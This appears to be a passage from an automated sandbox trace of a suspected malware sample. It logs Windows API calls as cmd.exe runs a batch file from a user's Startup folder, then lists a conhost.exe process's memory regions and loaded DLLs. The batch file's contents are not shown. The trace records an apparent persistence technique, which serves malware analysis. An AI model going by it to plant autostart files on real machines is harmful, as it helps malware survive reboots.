[0262.032] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0262.032] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0262.032] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0262.032] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0262.033] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0262.033] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0262.033] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0262.033] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0262.033] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0262.033] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0262.033] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0262.033] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0262.033] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0262.033] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0262.033] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0262.033] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0262.033] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0262.033] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0262.033] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0262.033] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0262.033] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0262.033] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0262.033] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0262.033] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0262.033] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0262.033] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0262.033] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0262.033] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0262.033] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0262.033] GetProcessHeap () returned 0x530000 [0262.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x218) returned 0x537490 [0262.034] GetProcessHeap () returned 0x530000 [0262.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xda) returned 0x5376b0 [0262.034] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0262.034] GetProcessHeap () returned 0x530000 [0262.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x420) returned 0x5377a0 [0262.035] SetErrorMode (uMode=0x0) returned 0x0 [0262.035] SetErrorMode (uMode=0x1) returned 0x0 [0262.035] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\.", nBufferLength=0x208, lpBuffer=0x5377b0, lpFilePart=0x14f450 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x14f450*="Startup") returned 0x53 [0262.035] SetErrorMode (uMode=0x0) returned 0x1 [0262.035] GetProcessHeap () returned 0x530000 [0262.035] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5377a0, Size=0xd2) returned 0x5377a0 [0262.035] GetProcessHeap () returned 0x530000 [0262.035] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5377a0) returned 0xd2 [0262.035] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\.") returned 1 [0262.035] GetProcessHeap () returned 0x530000 [0262.035] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xbe) returned 0x537890 [0262.035] GetProcessHeap () returned 0x530000 [0262.035] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x168) returned 0x537960 [0262.036] GetProcessHeap () returned 0x530000 [0262.036] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x537960, Size=0xbe) returned 0x537960 [0262.036] GetProcessHeap () returned 0x530000 [0262.036] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x537960) returned 0xbe [0262.036] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6238896a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0262.036] GetProcessHeap () returned 0x530000 [0262.036] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe8) returned 0x537a30 [0262.040] GetProcessHeap () returned 0x530000 [0262.040] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x537a30, Size=0x7e) returned 0x537a30 [0262.040] GetProcessHeap () returned 0x530000 [0262.040] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x537a30) returned 0x7e [0262.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.040] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\programs.bat"), fInfoLevelId=0x1, lpFindFileData=0x14f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f1d0) returned 0x5369f0 [0262.041] GetProcessHeap () returned 0x530000 [0262.041] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x536a50 [0262.041] FindClose (in: hFindFile=0x5369f0 | out: hFindFile=0x5369f0) returned 1 [0262.041] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0262.041] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0262.041] GetConsoleTitleW (in: lpConsoleTitle=0x14f730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.042] GetProcessHeap () returned 0x530000 [0262.042] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e8) returned 0x537ac0 [0262.042] ApiSetQueryApiSetPresence () returned 0x0 [0262.042] ResolveDelayLoadedAPI () returned 0x7ff857ef1010 [0262.168] SaferWorker () returned 0x0 [0262.194] SetErrorMode (uMode=0x0) returned 0x0 [0262.200] SetErrorMode (uMode=0x1) returned 0x0 [0262.200] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", nBufferLength=0x104, lpBuffer=0x5374a0, lpFilePart=0x14f550 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", lpFilePart=0x14f550*="programs.bat") returned 0x60 [0262.200] SetErrorMode (uMode=0x0) returned 0x1 [0262.200] GetProcessHeap () returned 0x530000 [0262.200] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd6) returned 0x548180 [0262.200] wcsspn (_String=" ", _Control=" \x09") returned 0x1 [0262.200] GetProcessHeap () returned 0x530000 [0262.200] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x547d40 [0262.200] GetProcessHeap () returned 0x530000 [0262.200] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14) returned 0x547d80 [0262.200] GetProcessHeap () returned 0x530000 [0262.200] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x547d80, Size=0x14) returned 0x547cc0 [0262.200] GetProcessHeap () returned 0x530000 [0262.200] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x547cc0) returned 0x14 [0262.200] CmdBatNotificationStub () returned 0x0 [0262.201] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\programs.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f5c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0262.201] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0262.201] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.201] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.201] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.201] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.201] ReadFile (in: hFile=0x88, lpBuffer=0x7ff623895b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f580, lpOverlapped=0x0 | out: lpBuffer=0x7ff623895b80*, lpNumberOfBytesRead=0x14f580*=0x93, lpOverlapped=0x0) returned 1 [0262.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff623895b80, cbMultiByte=147, lpWideCharStr=0x7ff6238809e0, cchWideChar=8191 | out: lpWideCharStr="") returned 147 [0262.203] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.203] GetFileType (hFile=0x88) returned 0x1 [0262.203] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.203] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x93 [0262.203] GetProcessHeap () returned 0x530000 [0262.203] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4012) returned 0x53b850 [0262.203] GetProcessHeap () returned 0x530000 [0262.204] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53b850) returned 1 [0262.204] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.204] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x93 [0262.204] ReadFile (in: hFile=0x88, lpBuffer=0x7ff623895b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f580, lpOverlapped=0x0 | out: lpBuffer=0x7ff623895b80*, lpNumberOfBytesRead=0x14f580*=0x0, lpOverlapped=0x0) returned 1 [0262.205] GetLastError () returned 0x0 [0262.205] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.205] GetFileType (hFile=0x88) returned 0x1 [0262.205] _get_osfhandle (_FileHandle=3) returned 0x88 [0262.205] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x93 [0262.205] GetProcessHeap () returned 0x530000 [0262.205] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4012) returned 0x53b850 [0262.205] GetProcessHeap () returned 0x530000 [0262.206] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53b850) returned 1 [0262.206] longjmp () [0262.207] _tell (_FileHandle=3) returned 147 [0262.207] _close (_FileHandle=3) returned 0 [0262.207] CmdBatNotificationStub () returned 0x0 [0262.207] _get_osfhandle (_FileHandle=1) returned 0x24 [0262.207] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0262.208] _get_osfhandle (_FileHandle=1) returned 0x24 [0262.208] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff62388960c | out: lpMode=0x7ff62388960c) returned 1 [0262.208] _get_osfhandle (_FileHandle=0) returned 0x20 [0262.208] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff623889608 | out: lpMode=0x7ff623889608) returned 1 [0262.209] SetConsoleInputExeNameW () returned 0x1 [0262.209] GetConsoleOutputCP () returned 0x1b5 [0262.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff623889660 | out: lpCPInfo=0x7ff623889660) returned 1 [0262.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0262.209] exit (_Code=0) Thread: id = 23 os_tid = 0xdf0 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29991000" os_pid = "0xdc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xd8c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1069 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1070 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1071 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1072 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1073 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1074 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1075 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1076 start_va = 0x7ff6965e0000 end_va = 0x7ff6965f0fff monitored = 0 entry_point = 0x7ff6965e16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1077 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1078 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1079 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1080 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1081 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1082 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1083 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1084 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1085 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1086 start_va = 0x630000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1087 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1088 start_va = 0x7ff84f7a0000 end_va = 0x7ff84f7f8fff monitored = 0 entry_point = 0x7ff84f7afbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1089 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1090 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1091 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1092 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1093 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1094 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1095 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1096 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1097 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1098 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1099 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1100 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1123 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1124 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1125 start_va = 0x630000 end_va = 0x7b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1126 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1127 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1128 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1129 start_va = 0x1d90000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1139 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1140 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1141 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1142 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1143 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1144 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1145 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1146 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1147 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1148 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1164 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1165 start_va = 0x1ed0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1177 start_va = 0x20b0000 end_va = 0x23e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1182 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1183 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1184 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1185 start_va = 0x440000 end_va = 0x499fff monitored = 1 entry_point = 0x4553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1186 start_va = 0x23f0000 end_va = 0x260afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1187 start_va = 0x2610000 end_va = 0x2823fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 1188 start_va = 0x1d90000 end_va = 0x1e98fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1189 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 1190 start_va = 0x2830000 end_va = 0x2a49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1191 start_va = 0x1ed0000 end_va = 0x1fd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1192 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1193 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1194 start_va = 0x7ff85c200000 end_va = 0x7ff85c359fff monitored = 0 entry_point = 0x7ff85c2438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1195 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1196 start_va = 0x1fe0000 end_va = 0x209bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 1197 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1198 start_va = 0x7ff857680000 end_va = 0x7ff8576a1fff monitored = 0 entry_point = 0x7ff857681a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1199 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1200 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1201 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1202 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1203 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1204 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1205 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1208 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1209 start_va = 0x2a50000 end_va = 0x2c45fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 1210 start_va = 0x7ff851850000 end_va = 0x7ff851ac3fff monitored = 0 entry_point = 0x7ff8518c0400 region_type = mapped_file name = "comctl32.dll" filename = 